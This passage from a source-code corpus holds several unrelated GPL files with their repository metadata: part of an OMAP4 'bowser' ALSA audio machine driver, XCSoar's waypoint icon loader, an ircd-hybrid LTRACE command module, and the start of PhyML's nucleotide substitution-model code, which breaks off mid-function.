SND_SOC_DAIFMT_NB_NF);
if (ret < 0) {
dev_err(codec_dai->dev, "Failed to set CODEC DAI format: %d\n",
ret);
return ret;
}
ret = snd_soc_dai_set_fmt(cpu_dai, SND_SOC_DAIFMT_DSP_B |
SND_SOC_DAIFMT_CBM_CFM |
SND_SOC_DAIFMT_NB_NF);
if (ret < 0) {
dev_err(cpu_dai->dev, "Failed to set CPU DAI format: %d\n",
ret);
return ret;
}
dev_dbg(codec_dai->dev, "%s() - exit\n", __func__);
return 0;
}
static int bowser_abe_wm8962_startup(struct snd_pcm_substream *substream)
{
struct snd_soc_pcm_runtime *rtd = substream->private_data;
struct snd_soc_dai *codec_dai = rtd->codec_dai;
dev_dbg(codec_dai->dev, "%s() - enter\n", __func__);
if (wm8962_mclk != NULL)
clk_enable(wm8962_mclk);
dev_dbg(codec_dai->dev, "%s() - exit\n", __func__);
return 0;
}
static void bowser_abe_wm8962_shutdown(struct snd_pcm_substream *substream)
{
struct snd_soc_pcm_runtime *rtd = substream->private_data;
struct snd_soc_dai *codec_dai = rtd->codec_dai;
dev_dbg(codec_dai->dev, "%s() - enter\n", __func__);
if (wm8962_mclk != NULL)
clk_disable(wm8962_mclk);
dev_dbg(codec_dai->dev, "%s() - exit\n", __func__);
}
static struct snd_soc_ops bowser_abe_ops = {
/* .startup = bowser_abe_wm8962_startup,
.shutdown = bowser_abe_wm8962_shutdown,*/ /*may need them for extra stuffs TI wants*/
.hw_params = bowser_wm8962_hw_params,
};
static int bowser_mcbsp_hw_params(struct snd_pcm_substream *substream,
struct snd_pcm_hw_params *params)
{
struct snd_soc_pcm_runtime *rtd = substream->private_data;
struct snd_soc_dai *cpu_dai = rtd->cpu_dai;
int ret = 0;
unsigned int be_id, channels;
ret = snd_soc_dai_set_fmt(cpu_dai,
SND_SOC_DAIFMT_DSP_C |
SND_SOC_DAIFMT_NB_NF |
SND_SOC_DAIFMT_CBM_CFM);
if (ret < 0) {
printk(KERN_ERR "can't set cpu DAI configuration\n");
return ret;
}
omap_mcbsp_set_tx_threshold(cpu_dai->id, 1);
return ret;
}
static struct snd_soc_ops bowser_mcbsp_ops = {
.hw_params = bowser_mcbsp_hw_params,
};
static const struct snd_soc_dapm_widget bowser_dapm_widgets[] = {
SND_SOC_DAPM_HP("HP", NULL),
SND_SOC_DAPM_SPK("SPK", NULL),
};
static const struct snd_kcontrol_new bowser_controls[] = {
SOC_DAPM_PIN_SWITCH("DMICDAT"),
SOC_DAPM_PIN_SWITCH("HP"),
SOC_DAPM_PIN_SWITCH("SPK"),
};
static const struct snd_soc_dapm_route bowser_dapm_routes[] = {
{ "HP", NULL, "HPOUTL" },
{ "HP", NULL, "HPOUTR" },
{ "SPK", NULL, "SPKOUTL" },
{ "SPK", NULL, "SPKOUTR" },
};
static int bowser_wm8962_init(struct snd_soc_pcm_runtime *rtd)
{
struct snd_soc_codec *codec = rtd->codec;
struct snd_soc_dapm_context *dapm = &codec->dapm;
int ret;
codec_dai = rtd->codec_dai;
ret = snd_soc_dapm_new_controls(dapm, bowser_dapm_widgets,
ARRAY_SIZE(bowser_dapm_widgets));
if (ret < 0)
pr_err("Failed to register DAPM widgets for Bowser\n");
ret = snd_soc_dapm_add_routes(dapm, bowser_dapm_routes,
ARRAY_SIZE(bowser_dapm_routes));
if (ret < 0)
pr_err("Failed to register DAPM routes for Bowser\n");
ret = snd_soc_add_controls(codec, bowser_controls,
ARRAY_SIZE(bowser_controls));
if (ret < 0)
pr_err("Failed to add Bowser controls\n");
ret = snd_soc_jack_new(codec, "h2w",
SND_JACK_HEADSET | SND_JACK_HEADPHONE,
&bowser_jack);
if (ret) {
pr_err("Failed to create jack: %d\n", ret);
return ret;
}
snd_jack_set_key(bowser_jack.jack, SND_JACK_BTN_0, KEY_MEDIA);
ret = wm8962_get_jack(codec, &bowser_jack);
if (ret) {
pr_err("Failed to get jack: %d\n", ret);
return ret;
}
return 0;
}
static int mcbsp_be_hw_params_fixup(struct snd_soc_pcm_runtime *rtd,
struct snd_pcm_hw_params *params)
{
struct snd_soc_dai *cpu_dai = rtd->cpu_dai;
struct snd_interval *channels = hw_param_interval(params,
SNDRV_PCM_HW_PARAM_CHANNELS);
unsigned int be_id = rtd->dai_link->be_id;
unsigned int threshold;
switch (be_id) {
case OMAP_ABE_DAI_MM_FM:
channels->min = 2;
threshold = 2;
break;
case OMAP_ABE_DAI_BT_VX:
channels->min = 1;
threshold = 1;
break;
default:
threshold = 1;
break;
}
snd_mask_set(¶ms->masks[SNDRV_PCM_HW_PARAM_FORMAT -
SNDRV_PCM_HW_PARAM_FIRST_MASK],
SNDRV_PCM_FORMAT_S16_LE);
omap_mcbsp_set_tx_threshold(cpu_dai->id, threshold);
omap_mcbsp_set_rx_threshold(cpu_dai->id, threshold);
return 0;
}
static struct snd_soc_dai_driver bt_dai[] = {
{
.name = "Bluetooth",
.playback = {
.stream_name = "BT Playback",
.channels_min = 1,
.channels_max = 1,
.rates = SNDRV_PCM_RATE_8000,
.formats = SNDRV_PCM_FMTBIT_S16_LE,
},
.capture = {
.stream_name = "BT Capture",
.channels_min = 1,
.channels_max = 1,
.rates = SNDRV_PCM_RATE_8000,
.formats = SNDRV_PCM_FMTBIT_S16_LE,
},
}
};
struct snd_soc_dsp_link fe_lp_media = {
.playback = true,
.trigger =
{SND_SOC_DSP_TRIGGER_BESPOKE, SND_SOC_DSP_TRIGGER_BESPOKE},
};
struct snd_soc_dsp_link fe_media = {
.playback = true,
.capture = true,
.trigger =
{SND_SOC_DSP_TRIGGER_BESPOKE, SND_SOC_DSP_TRIGGER_BESPOKE},
};
struct snd_soc_dsp_link fe_media_capture = {
.capture = true,
.trigger =
{SND_SOC_DSP_TRIGGER_BESPOKE, SND_SOC_DSP_TRIGGER_BESPOKE},
};
/* Digital audio interface glue - connects codec <--> CPU */
static struct snd_soc_dai_link bowser_dai[] = {
{
.name = "wm8962-lp",
.stream_name = "Multimedia",
/* ABE components - MM-DL (mmap) */
.cpu_dai_name = "MultiMedia1 LP",
.platform_name = "aess",
.dynamic = 1, /* BE is dynamic */
.dsp_link = &fe_lp_media,
},
{
.name = "wm8962",
.stream_name = "Multimedia",
/* ABE components - MM-UL & MM_DL */
.cpu_dai_name = "MultiMedia1",
.platform_name = "omap-pcm-audio",
.dynamic = 1, /* BE is dynamic */
.dsp_link = &fe_media,
},
{
.name = "wm8962-noabe",
.stream_name = "wm8962",
.cpu_dai_name = "omap-mcbsp-dai.1", /* McBSP2 */
.platform_name = "omap-pcm-audio",
.codec_dai_name = "wm8962",
.codec_name = "wm8962.3-001a",
.ops = &bowser_abe_ops,
.init = &bowser_wm8962_init,
},
{
.name = "wm8962-mm-ul2",
.stream_name = "Multimedia Capture",
/* ABE components - MM-UL2 */
.cpu_dai_name = "MultiMedia2",
.platform_name = "omap-pcm-audio",
.dynamic = 1, /* BE is dynamic */
.dsp_link = &fe_media_capture,
},
{
.name = "BT Playback",
.stream_name = "Bluetooth Playback",
/* MCBSP3 ->BT SCO */
.cpu_dai_name = "omap-mcbsp-dai.2",
.platform_name = "omap-pcm-audio",
/* Bluetooth */
.codec_dai_name = "Bluetooth",
.no_codec = 1, /* TODO: have a dummy CODEC */
.ops = &bowser_mcbsp_ops,
},
{
.name = "BT Capture",
.stream_name = "Bluetooth Capture",
/* MCBSP3 <-BT SCO */
.cpu_dai_name = "omap-mcbsp-dai.2",
.platform_name = "omap-pcm-audio",
/* Bluetooth */
.codec_dai_name = "Bluetooth",
.no_codec = 1, /* TODO: have a dummy CODEC */
.ops = &bowser_mcbsp_ops,
},
/*
* Backend DAIs - i.e. dynamically matched interfaces, invisible to userspace.
* Matched to above interfaces at runtime, based upon use case.
*/
{
.name = OMAP_ABE_BE_MM_EXT0_DL,
.stream_name = "PCM Playback",
/* ABE components - MCBSP2 - MM-EXT */
.cpu_dai_name = "omap-mcbsp-dai.1",
.platform_name = "aess",
/* FM */
.codec_dai_name = "wm8962",
.codec_name = "wm8962.3-001a",
.no_pcm = 1, /* don't create ALSA pcm for this */
.be_hw_params_fixup = mcbsp_be_hw_params_fixup,
.ops = &bowser_abe_ops,
.be_id = OMAP_ABE_DAI_MM_FM,
},
{
.name = OMAP_ABE_BE_MM_EXT0_UL,
.stream_name = "PCM Capture",
/* ABE components - MCBSP2 - MM-EXT */
.cpu_dai_name = "omap-mcbsp-dai.1",
.platform_name = "aess",
/* FM */
.codec_dai_name = "wm8962",
.codec_name = "wm8962.3-001a",
.no_pcm = 1, /* don't create ALSA pcm for this */
.be_hw_params_fixup = mcbsp_be_hw_params_fixup,
.ops = &bowser_abe_ops,
.be_id = OMAP_ABE_DAI_MM_FM,
},
};
/* Audio machine driver */
static struct snd_soc_card snd_soc_bowser = {
.name = "bowser",
.long_name = "TI OMAP4 bowser Board",
.dai_link = bowser_dai,
.num_links = ARRAY_SIZE(bowser_dai),
.set_bias_level = bowser_set_bias_level,
.set_bias_level_post = bowser_set_bias_level_post,
.suspend_pre = bowser_suspend_pre,
.resume_post = bowser_resume_post,
};
static struct platform_device *bowser_snd_device;
static int __init bowser_soc_init(void)
{
int ret = 0;
if (!machine_is_omap_4430sdp() &&
!machine_is_omap4_panda() &&
!machine_is_omap4_bowser()) {
pr_debug("Not bowser or PandaBoard!\n");
return -ENODEV;
}
wm8962_mclk = clk_get(NULL, "auxclk0_ck");
if (IS_ERR(wm8962_mclk)) {
pr_err("Failed to get WM8962 MCLK: %ld\n",
PTR_ERR(wm8962_mclk));
return -ENODEV;
}
pr_debug("Old codec mclk rate = %lu\n", clk_get_rate(wm8962_mclk));
ret = clk_set_rate(wm8962_mclk, WM8962_MCLK_RATE);
if (ret < 0) {
pr_err("Failed to set MCLK rate: %d\n", ret);
goto clk_err;
}
pr_debug("New codec mclk rate = %lu\n", clk_get_rate(wm8962_mclk));
bowser_snd_device = platform_device_alloc("soc-audio", -1);
if (!bowser_snd_device) {
printk(KERN_ERR "Platform device allocation failed\n");
ret = -ENOMEM;
goto clk_err;
}
ret = snd_soc_register_dais(&bowser_snd_device->dev,
bt_dai, ARRAY_SIZE(bt_dai));
if (ret < 0)
goto dai_err;
platform_set_drvdata(bowser_snd_device, &snd_soc_bowser);
ret = platform_device_add(bowser_snd_device);
if (ret) {
pr_err("Couldn't add bowser snd device ret: %d\n", ret);
goto plat_err;
}
/* av_switch_reg = regulator_get(&bowser_snd_device->dev, "av-switch");
if (IS_ERR(av_switch_reg)) {
ret = PTR_ERR(av_switch_reg);
printk(KERN_ERR "couldn't get AV Switch regulator %d\n",
ret);
goto reg_err;
}*/
return ret;
reg_err:
platform_device_del(bowser_snd_device);
plat_err:
platform_device_put(bowser_snd_device);
clk_err:
clk_put(wm8962_mclk);
dai_err:
return ret;
}
module_init(bowser_soc_init);
static void __exit bowser_soc_exit(void)
{
/* regulator_put(av_switch_reg); */
platform_device_unregister(bowser_snd_device);
clk_put(wm8962_mclk);
}
module_exit(bowser_soc_exit);
MODULE_AUTHOR("Misael Lopez Cruz <x0052729@ti.com>");
MODULE_DESCRIPTION("ALSA SoC bowser");
MODULE_LICENSE("GPL");
| gpl-2.0 |
onkelhotte/XCSoar | src/Look/WaypointLook.cpp | 2 | 3974 | /*
Copyright_License {
XCSoar Glide Computer - http://www.xcsoar.org/
Copyright (C) 2000-2013 The XCSoar Project
A detailed list of copyright holders can be found in the file "AUTHORS".
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
}
*/
#include "WaypointLook.hpp"
#include "Renderer/WaypointRendererSettings.hpp"
#include "resource.h"
void
WaypointLook::Initialise(const WaypointRendererSettings &settings)
{
small_icon.Load(IDB_SMALL, IDB_SMALL_HD);
turn_point_icon.Load(IDB_TURNPOINT, IDB_TURNPOINT_HD);
task_turn_point_icon.Load(IDB_TASKTURNPOINT, IDB_TASKTURNPOINT_HD);
mountain_top_icon.Load(IDB_MOUNTAIN_TOP, IDB_MOUNTAIN_TOP_HD);
mountain_pass_icon.Load(IDB_MOUNTAIN_PASS, IDB_MOUNTAIN_PASS_HD);
bridge_icon.Load(IDB_BRIDGE, IDB_BRIDGE_HD);
tunnel_icon.Load(IDB_TUNNEL, IDB_TUNNEL_HD);
tower_icon.Load(IDB_TOWER, IDB_TOWER_HD);
power_plant_icon.Load(IDB_POWER_PLANT, IDB_POWER_PLANT_HD);
obstacle_icon.Load(IDB_OBSTACLE, IDB_OBSTACLE_HD);
reachable_brush.Set(COLOR_GREEN);
terrain_unreachable_brush.Set(LightColor(COLOR_RED));
unreachable_brush.Set(COLOR_RED);
white_brush.Set(COLOR_WHITE);
light_gray_brush.Set(COLOR_LIGHT_GRAY);
magenta_brush.Set(COLOR_MAGENTA);
orange_brush.Set(COLOR_ORANGE);
switch (settings.landable_style) {
case WaypointRendererSettings::LandableStyle::PURPLE_CIRCLE:
airport_reachable_icon.Load(IDB_REACHABLE, IDB_REACHABLE_HD);
airport_marginal_icon.Load(IDB_MARGINAL, IDB_MARGINAL_HD);
airport_unreachable_icon.Load(IDB_LANDABLE, IDB_LANDABLE_HD);
field_reachable_icon.Load(IDB_REACHABLE, IDB_REACHABLE_HD);
field_marginal_icon.Load(IDB_MARGINAL, IDB_MARGINAL_HD);
field_unreachable_icon.Load(IDB_LANDABLE, IDB_LANDABLE_HD);
break;
case WaypointRendererSettings::LandableStyle::BW:
airport_reachable_icon.Load(IDB_AIRPORT_REACHABLE,
IDB_AIRPORT_REACHABLE_HD);
airport_marginal_icon.Load(IDB_AIRPORT_MARGINAL,
IDB_AIRPORT_MARGINAL_HD);
airport_unreachable_icon.Load(IDB_AIRPORT_UNREACHABLE,
IDB_AIRPORT_UNREACHABLE_HD);
field_reachable_icon.Load(IDB_OUTFIELD_REACHABLE,
IDB_OUTFIELD_REACHABLE_HD);
field_marginal_icon.Load(IDB_OUTFIELD_MARGINAL,
IDB_OUTFIELD_MARGINAL_HD);
field_unreachable_icon.Load(IDB_OUTFIELD_UNREACHABLE,
IDB_OUTFIELD_UNREACHABLE_HD);
break;
case WaypointRendererSettings::LandableStyle::TRAFFIC_LIGHTS:
airport_reachable_icon.Load(IDB_AIRPORT_REACHABLE,
IDB_AIRPORT_REACHABLE_HD);
airport_marginal_icon.Load(IDB_AIRPORT_MARGINAL2,
IDB_AIRPORT_MARGINAL2_HD);
airport_unreachable_icon.Load(IDB_AIRPORT_UNREACHABLE2,
IDB_AIRPORT_UNREACHABLE2_HD);
field_reachable_icon.Load(IDB_OUTFIELD_REACHABLE,
IDB_OUTFIELD_REACHABLE_HD);
field_marginal_icon.Load(IDB_OUTFIELD_MARGINAL2,
IDB_OUTFIELD_MARGINAL2_HD);
field_unreachable_icon.Load(IDB_OUTFIELD_UNREACHABLE2,
IDB_OUTFIELD_UNREACHABLE2_HD);
break;
}
}
| gpl-2.0 |
asterIRC/hamsterbox | contrib/m_ltrace.c | 2 | 9135 | /*
* ircd-hybrid: an advanced Internet Relay Chat Daemon(ircd).
* m_ltrace.c: Traces a path to a client/server.
*
* Copyright (C) 2002 Hybrid Development Team
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
* USA
*
* $Id: m_ltrace.c 131 2005-12-10 04:59:29Z jon $
*/
#include "stdinc.h"
#include "handlers.h"
#include "tools.h"
#include "hook.h"
#include "client.h"
#include "common.h"
#include "hash.h"
#include "irc_string.h"
#include "ircd.h"
#include "numeric.h"
#include "fdlist.h"
#include "s_bsd.h"
#include "s_serv.h"
#include "s_conf.h"
#include "send.h"
#include "msg.h"
#include "parse.h"
#include "modules.h"
#include "irc_getnameinfo.h"
static void do_ltrace(struct Client *, int, char **);
static void m_ltrace(struct Client *, struct Client *, int, char **);
static void mo_ltrace(struct Client *, struct Client *, int, char **);
struct Message ltrace_msgtab = {
"LTRACE", 0, 0, 0, 0, MFLG_SLOW, 0,
{m_unregistered, m_ltrace, mo_ltrace, m_ignore, mo_ltrace, m_ignore}
};
#ifndef STATIC_MODULES
const char *_version = "$Revision: 131 $";
static struct Callback *ltrace_cb;
static void *
va_ltrace(va_list args)
{
struct Client *source_p = va_arg(args, struct Client *);
int parc = va_arg(args, int);
char **parv = va_arg(args, char **);
do_ltrace(source_p, parc, parv);
return NULL;
}
void
_modinit(void)
{
ltrace_cb = register_callback("doing_ltrace", va_ltrace);
mod_add_cmd(<race_msgtab);
}
void
_moddeinit(void)
{
mod_del_cmd(<race_msgtab);
uninstall_hook(ltrace_cb, va_ltrace);
}
#endif
static int report_this_status(struct Client *source_p, struct Client *target_p, int dow,
int link_u_p, int link_u_s);
/*
* m_ltrace()
*
* parv[0] = sender prefix
* parv[1] = target client/server to trace
*/
static void
m_ltrace(struct Client *client_p, struct Client *source_p, int parc, char *parv[])
{
char *tname;
if(parc > 1)
tname = parv[1];
else
tname = me.name;
sendto_one(source_p, form_str(RPL_ENDOFTRACE), me.name, parv[0], tname);
}
/*
* do_ltrace
*/
static void
do_ltrace(struct Client *source_p, int parc, char **parv)
{
struct Client *target_p = NULL;
int doall;
int wilds, dow;
dlink_node *ptr;
char *looking_for = parv[0];
char *tname = parc > 1 ? parv[1] : me.name;
switch (hunt_server(source_p->from, source_p, ":%s LTRACE :%s", 1, parc, parv))
{
case HUNTED_PASS: /* note: gets here only if parv[1] exists */
{
struct Client *ac2ptr = NULL;
if((ac2ptr = find_client(tname)) == NULL)
DLINK_FOREACH(ptr, global_client_list.head)
{
ac2ptr = ptr->data;
if(match(tname, ac2ptr->name) || match(ac2ptr->name, tname))
break;
else
ac2ptr = NULL;
}
if(ac2ptr != NULL)
sendto_one(source_p, form_str(RPL_TRACELINK), me.name, looking_for,
ircd_version, tname, ac2ptr->from->name);
else
sendto_one(source_p, form_str(RPL_TRACELINK), me.name, looking_for,
ircd_version, tname, "ac2ptr_is_NULL!!");
return;
}
case HUNTED_ISME:
break;
default:
return;
}
doall = (parv[1] && (parc > 1)) ? match(tname, me.name) : TRUE;
wilds = !parv[1] || strchr(tname, '*') || strchr(tname, '?');
dow = wilds || doall;
/* lusers cant issue ltrace.. */
if(!dow)
{
const char *name;
const char *class_name;
char ipaddr[HOSTIPLEN];
target_p = find_client(tname);
if(target_p && IsClient(target_p))
{
name = get_client_name(target_p, HIDE_IP);
/* Should this be sockhost? - stu */
irc_getnameinfo((struct sockaddr *) &target_p->localClient->ip,
target_p->localClient->ip.ss_len, ipaddr,
HOSTIPLEN, NULL, 0, NI_NUMERICHOST);
class_name = get_client_class(target_p);
if(IsOper(target_p))
{
if(ConfigFileEntry.hide_spoof_ips)
sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
me.name, source_p->name, class_name, name,
(IsIPSpoof(target_p) ? "255.255.255.255" :
ipaddr), CurrentTime - target_p->lasttime,
CurrentTime - target_p->localClient->last);
else
sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
me.name, source_p->name, class_name, name,
(IsIPSpoof(target_p) ? "255.255.255.255" :
ipaddr), CurrentTime - target_p->lasttime,
CurrentTime - target_p->localClient->last);
}
}
sendto_one(source_p, form_str(RPL_ENDOFTRACE), me.name, source_p->name, tname);
return;
}
/* report all opers */
DLINK_FOREACH(ptr, local_client_list.head)
{
target_p = ptr->data;
if(!IsOper(target_p))
continue;
if(!doall && wilds && !match(tname, target_p->name))
continue;
if(!dow && irccmp(tname, target_p->name))
continue;
report_this_status(source_p, target_p, dow, 0, 0);
}
/* report all servers */
DLINK_FOREACH(ptr, serv_list.head)
{
target_p = ptr->data;
if(!doall && wilds && !match(tname, target_p->name))
continue;
if(!dow && irccmp(tname, target_p->name))
continue;
report_this_status(source_p, target_p, dow, target_p->serv->dep_users,
target_p->serv->dep_servers);
}
sendto_one(source_p, form_str(RPL_ENDOFTRACE), me.name, parv[0], tname);
}
/*
* mo_ltrace
* parv[0] = sender prefix
* parv[1] = servername
*/
static void
mo_ltrace(struct Client *client_p, struct Client *source_p, int parc, char *parv[])
{
if(!IsOper(source_p))
{
sendto_one(source_p, form_str(RPL_ENDOFTRACE), me.name, parv[0],
parc > 1 ? parv[1] : me.name);
return;
}
if(parc > 2)
if(hunt_server(client_p, source_p, ":%s LTRACE %s :%s", 2, parc, parv))
return;
#ifdef STATIC_MODULES
do_ltrace(source_p, parc, parv);
#else
execute_callback(ltrace_cb, source_p, parc, parv);
#endif
}
/*
* report_this_status
*
* inputs - pointer to client to report to
* - pointer to client to report about
* output - counter of number of hits
* side effects - NONE
*/
static int
report_this_status(struct Client *source_p, struct Client *target_p,
int dow, int link_u_p, int link_s_p)
{
const char *name = NULL;
const char *class_name = NULL;
char ip[HOSTIPLEN];
/* Should this be sockhost? - stu */
irc_getnameinfo((struct sockaddr *) &target_p->localClient->ip,
target_p->localClient->ip.ss_len, ip, HOSTIPLEN, NULL, 0, NI_NUMERICHOST);
name = get_client_name(target_p, HIDE_IP);
class_name = get_client_class(target_p);
switch (target_p->status)
{
case STAT_CONNECTING:
sendto_one(source_p, form_str(RPL_TRACECONNECTING), me.name,
source_p->name, class_name, IsAdmin(source_p) ? name : target_p->name);
break;
case STAT_HANDSHAKE:
sendto_one(source_p, form_str(RPL_TRACEHANDSHAKE), me.name,
source_p->name, class_name, IsAdmin(source_p) ? name : target_p->name);
break;
case STAT_CLIENT:
if(IsAdmin(target_p))
{
if(ConfigFileEntry.hide_spoof_ips)
sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
me.name, source_p->name, class_name, name,
(IsIPSpoof(target_p) ? "255.255.255.255" : ip),
CurrentTime - target_p->lasttime,
CurrentTime - target_p->localClient->last);
else
sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
me.name, source_p->name, class_name, name,
IsAdmin(source_p) ? ip :
(IsIPSpoof(target_p) ? "255.255.255.255" : ip),
CurrentTime - target_p->lasttime,
CurrentTime - target_p->localClient->last);
}
else if(IsOper(target_p))
{
if(ConfigFileEntry.hide_spoof_ips)
sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
me.name, source_p->name, class_name, name,
(IsIPSpoof(target_p) ? "255.255.255.255" : ip),
CurrentTime - target_p->lasttime,
CurrentTime - target_p->localClient->last);
else
sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
me.name, source_p->name, class_name, name,
(IsIPSpoof(target_p) ? "255.255.255.255" : ip),
CurrentTime - target_p->lasttime,
CurrentTime - target_p->localClient->last);
}
break;
case STAT_SERVER:
if(!IsAdmin(source_p))
name = get_client_name(target_p, MASK_IP);
sendto_one(source_p, form_str(RPL_TRACESERVER),
me.name, source_p->name, class_name, link_s_p,
link_u_p, name, *(target_p->serv->by) ?
target_p->serv->by : "*", "*",
me.name, CurrentTime - target_p->lasttime);
break;
case STAT_ME:
case STAT_UNKNOWN:
break;
default: /* ...we actually shouldn't come here... --msa */
sendto_one(source_p, form_str(RPL_TRACENEWTYPE), me.name, source_p->name, name);
break;
}
return 0;
}
| gpl-2.0 |
Ensembl/treebest | phyml/models.c | 2 | 83965 | /*
PHYML : a program that computes maximum likelihood phylogenies from
DNA or AA homologous sequences
Copyright (C) Stephane Guindon. Oct 2003 onward
All parts of the source except where indicated are distributed under
the GNU public licence. See http://www.opensource.org for details.
*/
#include "utilities.h"
#include "models.h"
#include "eigen.h"
#include "free.h"
/*********************************************************/
void PMat_K80(double l,double kappa, double ***Pij)
{
double Ts,Tv,e1,e2,aux;
/*0 => A*/
/*1 => C*/
/*2 => G*/
/*3 => T*/
/* Ts -> transition*/
/* Tv -> transversion*/
aux = -2*l/(kappa+2);
e1 = exp(aux *2);
if (1.0!=kappa)
{
e2 = exp(aux *(kappa+1));
Tv = .25*(1-e1);
Ts = .25*(1+e1-2*e2);
}
else
{
Ts = Tv = .25*(1-e1);
}
(*Pij)[0][1] = (*Pij)[1][0] = Tv;
(*Pij)[0][2] = (*Pij)[2][0] = Ts;
(*Pij)[0][3] = (*Pij)[3][0] = Tv;
(*Pij)[1][2] = (*Pij)[2][1] = Tv;
(*Pij)[1][3] = (*Pij)[3][1] = Ts;
(*Pij)[2][3] = (*Pij)[3][2] = Tv;
(*Pij)[0][0] = (*Pij)[1][1] =
(*Pij)[2][2] = (*Pij)[3][3] = 1.-Ts-2.*Tv;
}
/*********************************************************/
void dPMat_K80(double l, double ***dPij, double rr, double k)
{
double aux,e1,e2;
double dTsl,dTsk;
double dTvl,dTvk;
/* Ts -> transition*/
/* Tv -> transversion*/
aux = -2.*l*rr/(k+2.);
e1 = exp(aux *2);
if (1.0!=k)
e2 = exp(aux *(k+1));
else
e2 = e1;
dTsl = -rr/(k+2) * e1 + rr*(k+1)/(k+2) * e2;
dTvl = rr/(k+2) * e1;
dTsk = l/pow(k+2,2) * (e1 + e2);
dTvk = l/pow(k+2,2) * e1;
/*First derivatives*/
/* branch lengths */
(*dPij)[0][0] = (*dPij)[1][1] =
(*dPij)[2][2] = (*dPij)[3][3] = -dTsl-2*dTvl;
(*dPij)[0][1] = (*dPij)[1][0] = dTvl;
(*dPij)[0][2] = (*dPij)[2][0] = dTsl;
(*dPij)[0][3] = (*dPij)[3][0] = dTvl;
(*dPij)[1][2] = (*dPij)[2][1] = dTvl;
(*dPij)[1][3] = (*dPij)[3][1] = dTsl;
(*dPij)[2][3] = (*dPij)[3][2] = dTvl;
}
/*********************************************************/
void d2PMat_K80(double l, double ***d2Pij, double rr, double k)
{
double e1,e2,aux,aux2,aux3,aux4;
double d2Tsl,d2Tsk;
double d2Tvl,d2Tvk;
/* Ts -> transition*/
/* Tv -> transversion*/
aux = -2.*l*rr/(k+2.);
e1 = exp(aux *2);
if (1.0!=k)
e2 = exp(aux *(k+1));
else
e2 = e1;
aux2 = rr*rr/pow(k+2,2);
aux3 = l /pow(k+2,3);
aux4 = l *l /pow(k+2,4);
d2Tvl = -4.*aux2 * e1;
d2Tsl = -d2Tvl -2*aux2 *pow((k+1),2) * e2;
d2Tvk = -2*aux3 * e1 + 4*aux4 * e1;
d2Tsk = d2Tvk -2*aux3 * e2 - 2*aux4 * e2;
/*Scnd derivatives*/
/* branch lengths */
(*d2Pij)[0][0] = (*d2Pij)[1][1] =
(*d2Pij)[2][2] = (*d2Pij)[3][3] = -d2Tsl-2*d2Tvl;
(*d2Pij)[0][1] = (*d2Pij)[1][0] = d2Tvl;
(*d2Pij)[0][2] = (*d2Pij)[2][0] = d2Tsl;
(*d2Pij)[0][3] = (*d2Pij)[3][0] = d2Tvl;
(*d2Pij)[1][2] = (*d2Pij)[2][1] = d2Tvl;
(*d2Pij)[1][3] = (*d2Pij)[3][1] = d2Tsl;
(*d2Pij)[2][3] = (*d2Pij)[3][2] = d2Tvl;
}
/*********************************************************/
void PMat_TN93(double l, model *mod, double ***Pij)
{
int i,j;
double e1,e2,e3;
double a1t,a2t,bt;
double A,C,G,T,R,Y;
double kappa1,kappa2;
int kappa_has_changed;
A = mod->pi[0]; C = mod->pi[1]; G = mod->pi[2]; T = mod->pi[3];
R = A+G; Y = T+C;
kappa_has_changed = 0;
if(mod->kappa < .0) mod->kappa = 1.0e-5;
if(mod->whichmodel < 5) { mod->lambda = 1.; }
else if(mod->whichmodel == 5)
{
do
{
mod->lambda = (Y+(R-Y)/(2.*mod->kappa))/(R-(R-Y)/(2.*mod->kappa));
if(mod->lambda < .0)
{
mod->kappa += mod->kappa/10.;
kappa_has_changed = 1;
}
}while(mod->lambda < .0);
}
if((!mod->s_opt->opt_kappa) && (kappa_has_changed))
{
printf("\n. WARNING: This transition/transversion ratio\n");
printf(" is impossible with these base frequencies!\n");
printf(" The ratio is now set to %.3f\n",mod->kappa);
}
kappa2 = mod->kappa*2./(1.+mod->lambda);
kappa1 = kappa2 * mod->lambda;
bt = l/(2.*(A*G*kappa1+C*T*kappa2+R*Y));
a1t = kappa1;
a2t = kappa2;
a1t*=bt; a2t*=bt;
e1 = exp(-a1t*R-bt*Y);
e2 = exp(-a2t*Y-bt*R);
e3 = exp(-bt);
/*A->A*/(*Pij)[0][0] = A+Y*A/R*e3+G/R*e1;
/*A->C*/(*Pij)[0][1] = C*(1-e3);
/*A->G*/(*Pij)[0][2] = G+Y*G/R*e3-G/R*e1;
/*A->T*/(*Pij)[0][3] = T*(1-e3);
/*C->A*/(*Pij)[1][0] = A*(1-e3);
/*C->C*/(*Pij)[1][1] = C+R*C/Y*e3+T/Y*e2;
/*C->G*/(*Pij)[1][2] = G*(1-e3);
/*C->T*/(*Pij)[1][3] = T+R*T/Y*e3-T/Y*e2;
/*G->A*/(*Pij)[2][0] = A+Y*A/R*e3-A/R*e1;
/*G->C*/(*Pij)[2][1] = C*(1-e3);
/*G->G*/(*Pij)[2][2] = G+Y*G/R*e3+A/R*e1;
/*G->T*/(*Pij)[2][3] = T*(1-e3);
/*T->A*/(*Pij)[3][0] = A*(1-e3);
/*T->C*/(*Pij)[3][1] = C+R*C/Y*e3-C/Y*e2;
/*T->G*/(*Pij)[3][2] = G*(1-e3);
/*T->T*/(*Pij)[3][3] = T+R*T/Y*e3+C/Y*e2;
For(i,4) For(j,4)
